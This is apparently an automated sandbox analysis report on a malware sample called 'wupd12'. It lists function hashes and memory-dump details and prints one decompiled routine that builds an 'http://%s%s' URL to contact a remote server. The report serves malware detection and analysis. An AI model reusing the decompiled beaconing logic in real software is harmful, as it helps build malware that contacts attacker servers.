API String ID: 0-2788708132
Opcode ID: e5a77e5645fab691a2bfefb459d8f09c97cea1ce1eac43c795361715250dc602
Instruction ID: ce0af79494489e4da1f80a82dd90ee50dfe5c5b6c0e0579fe97d4ca8a20cbacf
Opcode Fuzzy Hash: e5a77e5645fab691a2bfefb459d8f09c97cea1ce1eac43c795361715250dc602
Instruction Fuzzy Hash: 34418B72810604BBFB04CF65C98A79A7E74EF45316F14816EAD09AE19AC7388A609F58

Uniqueness

Uniqueness Score: 100.00%

Function 004C6EF0, Relevance: 1.4, Strings: 1, Instructions: 103UNIQUE

Download Yara Rule

Strings

zs, xrefs: 004C7003

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: zs
API String ID: 0-1560650501
Opcode ID: b00474687085563521460bc1fff8362be274fbd45bb13cacbc39facbf06e6f15
Instruction ID: c00e996d5969a8e5a9d05552436db85623539f9b5fc3c620b74a7eb335fc263e
Opcode Fuzzy Hash: b00474687085563521460bc1fff8362be274fbd45bb13cacbc39facbf06e6f15
Instruction Fuzzy Hash: 3041B0B2C14204ABFB048F61C89679A7FB5EF90316F18C1BA9C18AD186CB7C86608F14

Uniqueness

Uniqueness Score: 100.00%

Function 004C9207, Relevance: 1.4, Strings: 1, Instructions: 102UNIQUE

Download Yara Rule

Strings

i, xrefs: 004C933D

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: i
API String ID: 0-355674895
Opcode ID: ee3a3cc633f56848246eb89fc3a00ff45fdc776694237827f5092798e5ffc63c
Instruction ID: b73e3a0a3e1af67d14827986806c91f358ae6437c859e6e51c82a2dead13ce88
Opcode Fuzzy Hash: ee3a3cc633f56848246eb89fc3a00ff45fdc776694237827f5092798e5ffc63c
Instruction Fuzzy Hash: 67417DB2810605ABFF04CF25C946B9A7B74FF40326F19C1BEAC099A186C77C87159B94

Uniqueness

Uniqueness Score: 100.00%

Function 004CC6D0, Relevance: 1.4, Strings: 1, Instructions: 101UNIQUE

Download Yara Rule

Strings

*r, xrefs: 004CC6FA

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: *r
API String ID: 0-2428096199
Opcode ID: 19ce63c34685d9b4c18ae028965bf8aa60df722703b1f61a7bfa05aa2e464f4f
Instruction ID: debe14f105f0c79312ec621e61d84129052657f229d22e8ccc0b9ef2118bce52
Opcode Fuzzy Hash: 19ce63c34685d9b4c18ae028965bf8aa60df722703b1f61a7bfa05aa2e464f4f
Instruction Fuzzy Hash: 2E418472C1160AAFFB048F61C8467997B74FF80316F19C1FEAC19AA186D33897619F54

Uniqueness

Uniqueness Score: 100.00%

Function 004C3275, Relevance: 1.4, Strings: 1, Instructions: 100UNIQUE

Download Yara Rule

Strings

X, xrefs: 004C32B4

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-1540231818
Opcode ID: 9c02563645c1f30a50c7f87d56e6c403a7f6964bf66e0fd56cee53cdfb223e76
Instruction ID: 1a96ac97e47f3b10e23e849c09429c4293797f1860ae8c6ed8332e841939c649
Opcode Fuzzy Hash: 9c02563645c1f30a50c7f87d56e6c403a7f6964bf66e0fd56cee53cdfb223e76
Instruction Fuzzy Hash: 6341C072914604AFFB00CF65CC4979A7B75FF81316F14C26AAC18AA1DAD77C8B218F94

Uniqueness

Uniqueness Score: 100.00%

Function 004CCED8, Relevance: 1.3, Strings: 1, Instructions: 99UNIQUE

Download Yara Rule

Strings

E, xrefs: 004CD015

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: E
API String ID: 0-4189953480
Opcode ID: d62c1c8be1a19c899206fc125c53d972b799a7d0b5cb1fc89129079b37469733
Instruction ID: e925384c91b904df6092ff536664de7af934e2b7fa88fb0a24acb762bab6b3d2
Opcode Fuzzy Hash: d62c1c8be1a19c899206fc125c53d972b799a7d0b5cb1fc89129079b37469733
Instruction Fuzzy Hash: 8741A273824204AFFB018F64C886B897B75EF80315F19C1799C18AE1CAD77C97549BA4

Uniqueness

Uniqueness Score: 100.00%

Function 004C1894, Relevance: 1.3, Strings: 1, Instructions: 97UNIQUE

Download Yara Rule

Strings

Wu, xrefs: 004C19ED

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: Wu
API String ID: 0-2488032479
Opcode ID: e02d15123fab0aa17caf7d58d58149490ee7cb23efd35fc4521276fb19dacca8
Instruction ID: 4bba91b183e4e637a1dc8794c22f13fe9f6ef50a6a2f178976141f3e995649c3
Opcode Fuzzy Hash: e02d15123fab0aa17caf7d58d58149490ee7cb23efd35fc4521276fb19dacca8
Instruction Fuzzy Hash: 72419532914604ABFB058F28C48669A7B74FF40316F28C1BA9C48AE186D77CCB55DF99

Uniqueness

Uniqueness Score: 100.00%

Function 004C5FA4, Relevance: 1.3, Strings: 1, Instructions: 97UNIQUE

Download Yara Rule

Strings

A, xrefs: 004C6067

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-837457580
Opcode ID: b57b7bb59642bdb5fc81569c451db5394603cc6d74630c4da43f6007fc455c46
Instruction ID: 96edd8adb9da342091c053a52fc617165e99d14806be5154db1e68496f6713b9
Opcode Fuzzy Hash: b57b7bb59642bdb5fc81569c451db5394603cc6d74630c4da43f6007fc455c46
Instruction Fuzzy Hash: 8341CB729146049BFB04CF62C99A39A7F75FF40316F1881AA9D19AE0C6CB7C97218F58

Uniqueness

Uniqueness Score: 100.00%

Function 004C909D, Relevance: 1.3, Strings: 1, Instructions: 95UNIQUE

Download Yara Rule

Strings

*, xrefs: 004C91B1

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: *
API String ID: 0-2599975581
Opcode ID: 654fcd3f44a60cdfa3efea4300e24fc40687a50798bee005cf8ef11784e0c495
Instruction ID: f583d106dd7f324318c94685cb72763de038dbc8320e73a93f01417d17462dad
Opcode Fuzzy Hash: 654fcd3f44a60cdfa3efea4300e24fc40687a50798bee005cf8ef11784e0c495
Instruction Fuzzy Hash: 4D416072814744AFFB04CF65D88539A7B78FF40316F54C26A9C1AAA0D9D77C47218F94

Uniqueness

Uniqueness Score: 100.00%

Function 004DB1EC, Relevance: .9, Instructions: 866COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e3fbdfc4c26efb5c4c1e81ff7b4ef409395fb902dbf43141b10d5103b6001f7
Instruction ID: 36bd3197524d9f09104bdeca646484ec53e56067854ebe030c0dacdd0a21d8d5
Opcode Fuzzy Hash: 7e3fbdfc4c26efb5c4c1e81ff7b4ef409395fb902dbf43141b10d5103b6001f7
Instruction Fuzzy Hash: 2F82229644E3C25FE3038B745C79A91BFB1AE57218B0E46DFC1C18F0A3E25C185ADB66

Uniqueness

Uniqueness Score: 0.00%

Function 004DA346, Relevance: .8, Instructions: 751COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec81c1a864e069685bef33c39f7b44edde965878329a0c6c80cf0f08434a9f40
Instruction ID: 4f206ee7487bf417dd0c69fd189c3266a498c6294ca23104dc3c34856a76d4dd
Opcode Fuzzy Hash: ec81c1a864e069685bef33c39f7b44edde965878329a0c6c80cf0f08434a9f40
Instruction Fuzzy Hash: A862789645E3C15FD3038B745C7AA92BFB5AE67218B0E46CFC4C18F0A3E208555ACB67

Uniqueness

Uniqueness Score: 0.00%

Function 004219EF, Relevance: .4, Instructions: 411COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96d8738f38451a92ef9685cd8c245a0e439dbef85844bf38e407b7a81eb711da
Instruction ID: 255711e1e6c1d895e7328bbc1a61107e12f8575e3e6fecdd970fc97be160fd4f
Opcode Fuzzy Hash: 96d8738f38451a92ef9685cd8c245a0e439dbef85844bf38e407b7a81eb711da
Instruction Fuzzy Hash: 8AA15A1FB2066217FB2C5439E9ED3E70783D7A5724EEA61338A46937E6D88F0D435248

Uniqueness

Uniqueness Score: 0.00%

Function 0040C460, Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 458fbfb767ca5154ba3df8512fc79b4064e0c7939ad1145c4e84da959028d291
Instruction ID: a145b9bbb667aeffe4e370931388bda5dbbf9cb8131e6ffdad296358b0d6f87e
Opcode Fuzzy Hash: 458fbfb767ca5154ba3df8512fc79b4064e0c7939ad1145c4e84da959028d291
Instruction Fuzzy Hash: C391E9F65046083BD200E631EC46D67B7ACEB17328F05063AF96CD22C3F739A52887A5

Uniqueness

Uniqueness Score: 0.00%

Function 00409230, Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f44ac21f90c099dcab1d4cd007f380ea9e34bdf1834c62b5ce5c6af7cda1413
Instruction ID: 8fbe76a753e475378581e252a2af9a712bac8d94f5ebc8cb07686f97ae127e00
Opcode Fuzzy Hash: 0f44ac21f90c099dcab1d4cd007f380ea9e34bdf1834c62b5ce5c6af7cda1413
Instruction Fuzzy Hash: 8761C373609B858FC328CE1CD89045ABBE29EE5204B4C8B6DD4D6C7B93D570FA19C792

Uniqueness

Uniqueness Score: 0.00%

Function 004C37A0, Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4f58e9bb49f5fad3640367cbca3d9b4e224d24d78d3639a25053f1b39387961
Instruction ID: e218cb54229bb11566b3db11b3eda1922e8f32de947deaf008d9d46dfbdc4131
Opcode Fuzzy Hash: e4f58e9bb49f5fad3640367cbca3d9b4e224d24d78d3639a25053f1b39387961
Instruction Fuzzy Hash: 6741A472810204AFFF188F35C98599A3F79FF54316F0881BEAD08AE1C6CB399665CB54

Uniqueness

Uniqueness Score: 0.00%

Function 004C6A0D, Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff8fef4039bce599bc786f8bcf76ee691c0e952d35bace51f43f507bbde105a9
Instruction ID: e38c7e4e9bf05f75e13db6e45598ad5960ca454afd4f123edd2daa5f5c0e71a3
Opcode Fuzzy Hash: ff8fef4039bce599bc786f8bcf76ee691c0e952d35bace51f43f507bbde105a9
Instruction Fuzzy Hash: D931C3B3D24A04ABFB048F15C94A3EA7EB4EF90356F15C17A9D09DA1D1D77CC7418A90

Uniqueness

Uniqueness Score: 0.00%

Function 00406CF0, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b28b3a0480d2e35d4d350a0a67047c4cc3891c13993e56bb0ade65e47dfb85
Instruction ID: 097cbba052d85d00040cc188d29715b191e888fdda7c6a2cda7f8b413024f3e8
Opcode Fuzzy Hash: 08b28b3a0480d2e35d4d350a0a67047c4cc3891c13993e56bb0ade65e47dfb85
Instruction Fuzzy Hash: 00113AB6D19F498BD3129F39C941463FBE4BFDA640F018B1EE9D827601D730A645DA80

Uniqueness

Uniqueness Score: 0.00%

Function 0043947E, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5707159d7b813034dbf088ba93507412b86b62277ac13d7e6b120b550688b338
Instruction ID: 5f0a1fc3ad9e60fa443c216d6f1fedffe1e161c6f52d2176ac92c7eb89f76249
Opcode Fuzzy Hash: 5707159d7b813034dbf088ba93507412b86b62277ac13d7e6b120b550688b338
Instruction Fuzzy Hash: 87D0E936684340EBD6119B44DC85B153361A358724F252465D950373E1D3B47C819B5D

Uniqueness

Uniqueness Score: 0.00%

Function 00402BB0, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 193
stringUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00402BB0(intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v44;
				char _v140;
				intOrPtr _v144;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				signed int _v208;
				intOrPtr _v216;
				char _v221;
				char _v222;
				char _v223;
				CHAR* _v224;
				char _v225;
				char _v226;
				char _v227;
				CHAR* _v228;
				intOrPtr* _v236;
				intOrPtr* _v240;
				intOrPtr _v256;
				int _v260;
				intOrPtr _t56;
				CHAR* _t57;
				signed int _t64;
				signed int _t68;
				CHAR* _t75;
				int _t78;
				int _t79;
				int _t81;
				CHAR* _t98;
				int _t100;
				intOrPtr _t101;
				intOrPtr _t102;
				intOrPtr* _t116;
				CHAR* _t122;
				CHAR* _t134;
				CHAR* _t142;
				void* _t143;
				CHAR* _t146;
				CHAR** _t152;
				CHAR** _t156;

				asm("movsd xmm2, [0x43c49c]");
				asm("movsd xmm1, [0x43c494]");
				_t56 =  *0x43c4ac; // 0x43c47d
				asm("movsd xmm0, [0x43c4a4]");
				_t143 =  &_v140;
				_v196 = __ecx;
				_v192 = __edx;
				asm("movsd [esp+0x30], xmm2");
				asm("movsd [esp+0x28], xmm1");
				asm("movsd xmm2, [0x43c48c]");
				asm("movsd xmm1, [0x43c484]");
				_v144 = _t56;
				asm("movsd [esp+0x38], xmm0");
				asm("movsd [esp+0x20], xmm2");
				asm("movsd [esp+0x18], xmm1");
				_t57 = memcpy(_t143, 0x43c4b0, 0x1f << 2);
				E0043B583(0x400);
				_t98 = _t57;
				E00423F30(0x18);
				_t134 = _t57;
				E00415F80();
				 *((intOrPtr*)( *_t134 + 8))( &_v184, 0xb);
				 *((intOrPtr*)( *_t134 + 0xc))(_t143, 0x1f);
				 *((intOrPtr*)( *_t134 + 4))(GetTickCount());
				_t64 = GetTickCount();
				_v208 = _t64;
				E00423B90( &_v208);
				_t68 = (_t64 * 0x66666667 >> 0x20 >> 1) + (_t64 * 0x66666667 >> 0x20 >> 0x1f) + ((_t64 * 0x66666667 >> 0x20 >> 1) + (_t64 * 0x66666667 >> 0x20 >> 0x1f)) * 4;
				E00423B90( &_v208);
				_t152 =  &_v192 + 0x1c;
				_t75 =  *((intOrPtr*)( *_t134 + 0x10))(_t68 - (_t68 * 0x55555556 >> 0x20 >> 0x1f) + (_t68 * 0x55555556 >> 0x20) + ((_t68 * 0x55555556 >> 0x20 >> 0x1f) + (_t68 * 0x55555556 >> 0x20)) * 2, _t64 - _t68);
				if(_t75 != 0) {
					_v228 = _t98;
					_t146 = _t75;
					_t78 = lstrlenA(_t75);
					_t79 = lstrlenA(_v224);
					_t98 = _v228;
					if(_t79 + _t78 <= 0x3ff) {
						_t81 = wsprintfA(_t98, "http://%s%s", _v224, _t146);
						_v228 = 0;
						_v227 = 0;
						_v226 = 0;
						_v225 = 0;
						_v224 = 0;
						_v223 = 0;
						_v222 = 0;
						_v221 = 0;
						E00423F30(0x10);
						E00419400();
						_v228 = _t81;
						E00423F30(0x10);
						_t156 =  &(_t152[6]);
						_t142 = _t98;
						_t100 = _t81;
						E004192B0();
						_v224 = _t100;
						_t116 = _v228;
						if(_t116 == 0) {
							L8:
							 *((intOrPtr*)( *_t100))(1);
							_v228 = 0;
						} else {
							 *((intOrPtr*)( *_t116 + 4))(1);
							_t101 = _v216;
							 *((intOrPtr*)( *( *_t156) + 0xc))(_t101, _v20);
							 *((intOrPtr*)( *_v236 + 4))(1);
							_t102 = _v28;
							 *((intOrPtr*)( *_v240 + 0xc))(_t101, _v32);
							_push(_v32);
							_push(_t102);
							_push(_t142);
							if( *((intOrPtr*)( *( *_t156) + 8))() == 0) {
								 *((intOrPtr*)( *_v260 + 8))(_v256, _t102, _v44);
							}
							_t122 =  *_t156;
							if(_t122 != 0) {
								 *( *_t122)(1);
								 *_t156 = 0;
							}
							_t100 = _v260;
							if(_t100 != 0) {
								goto L8;
							}
						}
						L0043B58C(_t146);
						_t152 =  &(_t156[1]);
						_t98 = _v224;
					}
				}
				L0043B58C(_t98);
				return  *( *_t134)(1);
			}

0x00402bba
0x00402bc2
0x00402bca
0x00402bcf
0x00402bd7
0x00402bdb
0x00402bdf
0x00402bef
0x00402bf5
0x00402bfb
0x00402c03
0x00402c0b
0x00402c0f
0x00402c15
0x00402c1b
0x00402c21
0x00402c28
0x00402c30
0x00402c34
0x00402c3e
0x00402c40
0x00402c50
0x00402c5a
0x00402c6a
0x00402c6d
0x00402c73
0x00402c78
0x00402c92
0x00402c98
0x00402c9d
0x00402cbb
0x00402cc0
0x00402cc6
0x00402cd0
0x00402cd3
0x00402cdb
0x00402cdd
0x00402ce8
0x00402cf9
0x00402d02
0x00402d06
0x00402d0b
0x00402d10
0x00402d15
0x00402d1a
0x00402d1f
0x00402d24
0x00402d2b
0x00402d37
0x00402d3c
0x00402d41
0x00402d46
0x00402d4b
0x00402d4d
0x00402d4f
0x00402d54
0x00402d58
0x00402d5d
0x00402de7
0x00402ded
0x00402def
0x00402d63
0x00402d67
0x00402d76
0x00402d7b
0x00402d86
0x00402d97
0x00402d9e
0x00402da6
0x00402dad
0x00402dae
0x00402db4
0x00402dc8
0x00402dc8
0x00402dcb
0x00402dd0
0x00402dd6
0x00402dd8
0x00402dd8
0x00402ddf
0x00402de5
0x00000000
0x00000000
0x00402de5
0x00402df8
0x00402dfd
0x00402e00
0x00402e00
0x00402ce8
0x00402e05
0x00402e1f

APIs

GetTickCount.KERNEL32 ref: 00402C63
GetTickCount.KERNEL32 ref: 00402C6D
lstrlenA.KERNEL32(00000000), ref: 00402CD3
lstrlenA.KERNEL32(?), ref: 00402CDB
wsprintfA.USER32(?,http://%s%s,?,00000000), ref: 00402CF9

Strings

VUUU, xrefs: 00402CA0
gfff, xrefs: 00402C80
http://%s%s, xrefs: 00402CF3

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: CountTicklstrlen$wsprintf
String ID: VUUU$gfff$http://%s%s
API String ID: 856349486-2466471598
Opcode ID: 3315dd1e2e85a98f1288c2c4ac4502049468d9c8fa98008bb7f88d542cc12bfb
Instruction ID: f1b85fd2b3f24cb50b16229fb1c67be714eeebca3de63ea84c63ebb00edcc91d
Opcode Fuzzy Hash: 3315dd1e2e85a98f1288c2c4ac4502049468d9c8fa98008bb7f88d542cc12bfb
Instruction Fuzzy Hash: 837180746083409FD700DF69D899B1BBBE5AF89304F04892DF98A9B392DB759C04CB96

Uniqueness

Uniqueness Score: 100.00%

Function 00413FF4, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138UNIQUE

Download Yara Rule

APIs

CloseHandle.KERNEL32(004015B3,00401594,?,?,?,00401561,?), ref: 004015A9
AdjustWindowRect.USER32(?,?,?,00401561,?), ref: 004015F3
GetLastError.KERNEL32(hH@A,00413FE7,307B19EA,00001C01,00000001,00000000,?), ref: 00414001

Strings

hH@A, xrefs: 00413FF4

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: AdjustCloseErrorHandleLastRectWindow
String ID: hH@A
API String ID: 4017960869-1358815883
Opcode ID: c090f175c24a8b6056c72582176f1154ea071d75ba9d1d025a622370247a684a
Instruction ID: 98f8a1d7f3ed822611f16fbb6f83d10186bd974c66d047d2f5d1578280ef4982
Opcode Fuzzy Hash: c090f175c24a8b6056c72582176f1154ea071d75ba9d1d025a622370247a684a
Instruction Fuzzy Hash: 1C51BC6244D3C0AFC32397B49C65AA63FB4AF57354F1905EBD0D18F0E3D2291829D36A

Uniqueness

Uniqueness Score: 100.00%

Function 0040536D, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 125UNIQUE

Download Yara Rule

APIs

CloseHandle.KERNEL32(004015B3,00401594,?,?,?,00401561,?), ref: 004015A9
AdjustWindowRect.USER32(?,?,?,00401561,?), ref: 004015F3
AnimateWindow.USER32(hS@,00405360,2F592327,000026E2,?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0040537A
TlsSetValue.KERNEL32(hS@,00405360,2F592327,000026E2,?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0040538C

Strings

hS@, xrefs: 004053B6, 0040536D

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: Window$AdjustAnimateCloseHandleRectValue
String ID: hS@
API String ID: 512712315-2419851282
Opcode ID: 71b60c96f8b41a5a30996b7e84cc3dd4ba920a6b2ca23cb10a5fce8b0ab2c398
Instruction ID: 0868dbdf5bb2be68329180acea3367c3710d54a3a45e9cd81295556f794a0aa3
Opcode Fuzzy Hash: 71b60c96f8b41a5a30996b7e84cc3dd4ba920a6b2ca23cb10a5fce8b0ab2c398
Instruction Fuzzy Hash: 4E419B6248E3C0AFC32397B48C659623FB0AE97354B1E05DBD4C19F0F3D2295829D76A

Uniqueness

Uniqueness Score: 100.00%

Function 00439C50, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 170
memoryfileUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalAlloc.KERNEL32(00439D07,00439CDB,?,?,?,00439C97,?), ref: 00439CED
LsaClose.ADVAPI32(00439D3C,00439D07,00439CDB,?,?,?,00439C97,?), ref: 00439D1C
WriteFile.KERNEL32(00439D3C,00439D07,00439CDB,?,?,?,00439C97,?), ref: 00439D2E

Strings

CA, xrefs: 0043ACD2

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: AllocCloseFileLocalWrite
String ID: CA
API String ID: 1640885455-3386874932
Opcode ID: 347b5ffddac98b80bdddbda054adf56184363d986a3d221c30a90fcdcff994d6
Instruction ID: 7196dd285d76e4208d98284f386f973056ee97d5a5021943816fe27be906c0a1
Opcode Fuzzy Hash: 347b5ffddac98b80bdddbda054adf56184363d986a3d221c30a90fcdcff994d6
Instruction Fuzzy Hash: 2051237160D3C05FD7164B689D523667FB0EF0B314F1950DBE8808B2A3C2795D16D7AA

Uniqueness

Uniqueness Score: 100.00%

Function 004320D0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128UNIQUE

Download Yara Rule

APIs

CloseHandle.KERNEL32(004015B3,00401594,?,?,?,00401561,?), ref: 004015A9
AdjustWindowRect.USER32(?,?,?,00401561,?), ref: 004015F3

Part of subcall function 00432109: TlsGetValue.KERNEL32(00432124,004320FC,36FC12E7,000014CB,hE!C,004320C3,2F8F1558,000010E4,?), ref: 0043211A

Strings

hE!C, xrefs: 0043212A, 004320D0

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: AdjustCloseHandleRectValueWindow
String ID: hE!C
API String ID: 1304896528-3402451474
Opcode ID: 47ea1af575f01cc9db13f2fc58bb9a8fbec2e7db027d7a0d87b51a5ddcf2bad5
Instruction ID: f23e552e36c218ccaacf541776f93c90b46006d08d0a4908902a6acc0d0b5338
Opcode Fuzzy Hash: 47ea1af575f01cc9db13f2fc58bb9a8fbec2e7db027d7a0d87b51a5ddcf2bad5
Instruction Fuzzy Hash: 9941CC7244D3C06FC72297B48C26A623FB0AF9B354F1958DBD4C19B0F3D2295829D36A

Uniqueness

Uniqueness Score: 100.00%

Function 00413101, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123UNIQUE

Download Yara Rule

APIs

CloseHandle.KERNEL32(004015B3,00401594,?,?,?,00401561,?), ref: 004015A9
AdjustWindowRect.USER32(?,?,?,00401561,?), ref: 004015F3
wsprintfW.USER32(hW1A,004130F4,523712EC,0000158E,?,00000000), ref: 0041310E

Strings

hW1A, xrefs: 0041314C, 00413101

Memory Dump Source

